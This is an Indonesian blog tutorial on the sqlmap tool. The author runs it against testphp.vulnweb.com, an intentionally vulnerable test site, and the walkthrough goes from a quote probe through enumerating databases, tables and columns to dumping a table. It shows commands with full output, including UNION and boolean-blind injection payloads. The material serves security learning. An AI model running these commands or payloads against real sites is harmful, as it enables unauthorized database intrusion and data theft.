SQLMAP

Belajar Menggunakan Alat SQLMAP



Pada artikel ini saya akan memberikan ilmu bagaimana menggunakan alat SQLMAP. Simak saja langsung di bawah!


SQLMAP

Ouh ya perlu di ingat sebelum itu saya di sini hanya memberikan ilmu pengetahuan saja saya hanya memberikan ilmu yang saya telah miliki ini. Saya akan memberikan penjelasan dikit mengenai alat SQLMAP, jadi SQLMAP ini merupakan alat untuk mengeksploitasi server database kita tahu sebuah database pasti ada data di dalamnya dan tersimpan data data penting entah data email, password, paypal, ataupun data penting lainnya untuk di kelola nantinya suatu saat. Perlu di ingat lagi di artikel ini saya hanya mengajarkan kamu bagaimana untuk menggunakan alat SQLMAP dan alat tersebut menggunakan konsep sql injection harap kamu sudah paham apa itu sql injection.


Penginstallan

Jika kamu belum menginstall alat SQLMAP maka kamu harus perlu mengunjungi web resminya di sini lalu ekstrak pada folder kalian yang di inginkan itu dan pastikan kamu sudah install bahasa pemrograman python pada sistem operasi windows kamu karena secara default windows belum ter install python jadi bisa kunjungi di sini. Jika pada linux dan mac os maka sudah ter install python nya.


Waktunya Menggunakan

Saya akan menguji alat SQLMAP ini pada web yang di khususkan menyerang pada web : http://testphp.vulnweb.com/product.php?pic=1. Nah di web tersebut sudah di jelaskan :

Peringatan: Ini bukan toko sungguhan. Ini adalah contoh aplikasi PHP yang sengaja rentan terhadap serangan web. Hal ini dimaksudkan untuk membantu Anda menguji Acunetix. Ini juga membantu Anda memahami bagaimana kesalahan pengembang dan konfigurasi yang buruk dapat membuat seseorang membobol situs web Anda. Anda dapat menggunakannya untuk menguji alat lain dan keterampilan meretas manual Anda juga. Tip: Cari kemungkinan SQL Injection, Cross-site Scripting (XSS), dan Cross-site Request Forgery (CSRF), dan banyak lagi.

Ouh ya ketika sebuah website yang di bangun pada teknologi back end kita bisa mengetahui apakah web tersebut vuln apa tidak kamu bisa memetikkan tanda petik satu pada url :

http://testphp.vulnweb.com/product.php?pic=1'  jika memunculkan pesan warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/product.php on line 70 berarti website tersebut vuln.

Di sini saya menggunakan windows dalam teknik menggunakan SQLMAP sama saja jadi di sini saya akan mengchange directory kamu bisa lihat di bawah ini :

C:\Users\GalihAp76>cd sqlmap

Dan ini di lakukan pada terminal kamu perlu tahu letak alat SQLMAP kamu, alat SQLMAP saya berada pada folder C dan saya akan menggunakan alat SQLMAP ini kamu bisa lihat di bawah ini :

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1

Perintah di atas di maksudkan alat SQLMAP akan mengecek atau memindai pada url target apakah website tersebut rentan terhadap serangan sql injection? jika rentan maka muncul peringatan di bawah ini :

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:34:51 /2022-01-04/

[02:35:03] [INFO] resuming back-end DBMS 'mysql'
[02:35:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:35:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[02:35:05] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:35:05 /2022-01-04/

Selanjutnya saya akan cek ketersediaan yang terdapat pada database target tersebut :


C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dbs

Nanti akan muncul pesan berikut :

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:42:26 /2022-01-04/

[02:42:31] [INFO] resuming back-end DBMS 'mysql'
[02:42:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:42:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[02:42:32] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[02:42:33] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:42:33 /2022-01-04/

Saya akan mengambil ketersediaan database target pada database information_schema bisa di lihat di bawah ini :

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --tables -D information_schema

Yang akan di hasilkan :

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:50:05 /2022-01-04/

[02:50:07] [INFO] resuming back-end DBMS 'mysql'
[02:50:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[02:50:08] [INFO] fetching tables for database: 'information_schema'
Database: information_schema
[79 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
| CHECK_CONSTRAINTS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMNS_EXTENSIONS                    |
| COLUMN_PRIVILEGES                     |
| COLUMN_STATISTICS                     |
| ENABLED_ROLES                         |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CACHED_INDEXES                 |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_COLUMNS                        |
| INNODB_DATAFILES                      |
| INNODB_FIELDS                         |
| INNODB_FOREIGN                        |
| INNODB_FOREIGN_COLS                   |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_INDEXES                        |
| INNODB_METRICS                        |
| INNODB_SESSION_TEMP_TABLESPACES       |
| INNODB_TABLES                         |
| INNODB_TABLESPACES                    |
| INNODB_TABLESPACES_BRIEF              |
| INNODB_TABLESTATS                     |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_TRX                            |
| INNODB_VIRTUAL                        |
| KEYWORDS                              |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| RESOURCE_GROUPS                       |
| ROLE_COLUMN_GRANTS                    |
| ROLE_ROUTINE_GRANTS                   |
| ROLE_TABLE_GRANTS                     |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMATA_EXTENSIONS                   |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| ST_GEOMETRY_COLUMNS                   |
| ST_SPATIAL_REFERENCE_SYSTEMS          |
| ST_UNITS_OF_MEASURE                   |
| TABLES                                |
| TABLESPACES                           |
| TABLESPACES_EXTENSIONS                |
| TABLES_EXTENSIONS                     |
| TABLE_CONSTRAINTS                     |
| TABLE_CONSTRAINTS_EXTENSIONS          |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_ATTRIBUTES                       |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| VIEW_ROUTINE_USAGE                    |
| VIEW_TABLE_USAGE                      |
+---------------------------------------+

[02:50:09] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:50:09 /2022-01-04/

Saya akan pilih kolom dari database information_schema dan ambil tabel dari information_schema bernama USER_PRIVILEGES kamu bisa lihat perintah SQLMAP di bawah ini :


C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --columns -D information_schema -T USER_PRIVILEGES

Hasil :

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:56:34 /2022-01-04/

[02:56:36] [INFO] resuming back-end DBMS 'mysql'
[02:56:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:56:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[02:56:37] [INFO] fetching columns for table 'USER_PRIVILEGES' in database 'information_schema'
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| GRANTEE        | varchar(292) |
| IS_GRANTABLE   | varchar(3)   |
| PRIVILEGE_TYPE | varchar(64)  |
| TABLE_CATALOG  | varchar(512) |
+----------------+--------------+

[02:56:37] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:56:37 /2022-01-04/

Terakhir saya akan buang atau pun perintah ini saya maksud kan kita ambil dan tampilkan data yang ada dalam database MYSQL target :

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dump -D information_schema -T USER_PRIVILEGES

Hasil tersebut :

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:55 /2022-01-04/

[03:04:04] [INFO] resuming back-end DBMS 'mysql'
[03:04:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[03:04:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[03:04:05] [INFO] fetching columns for table 'USER_PRIVILEGES' in database 'information_schema'
[03:04:05] [INFO] fetching entries for table 'USER_PRIVILEGES' in database 'information_schema'
Database: information_schema
Table: USER_PRIVILEGES
[1 entry]
+----------------------+--------------+---------------+----------------+
| GRANTEE              | IS_GRANTABLE | TABLE_CATALOG | PRIVILEGE_TYPE |
+----------------------+--------------+---------------+----------------+
| 'acuart'@'localhost' | NO           | def           | USAGE          |
+----------------------+--------------+---------------+----------------+

[03:04:06] [INFO] table 'information_schema.USER_PRIVILEGES' dumped to CSV file 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\information_schema\USER_PRIVILEGES.csv'
[03:04:06] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 03:04:06 /2022-01-04/

Penutup

Di sini saya hanya memberikan beberapa perintah alat SQLMAP dan perintah alat SQLMAP masih ada banyak kamu bisa ketik perintah SQLMAP sqlmap.py -h maka akan muncul beberapa penggunaan alat SQLMAP tersebut. Semoga bermanfaat :D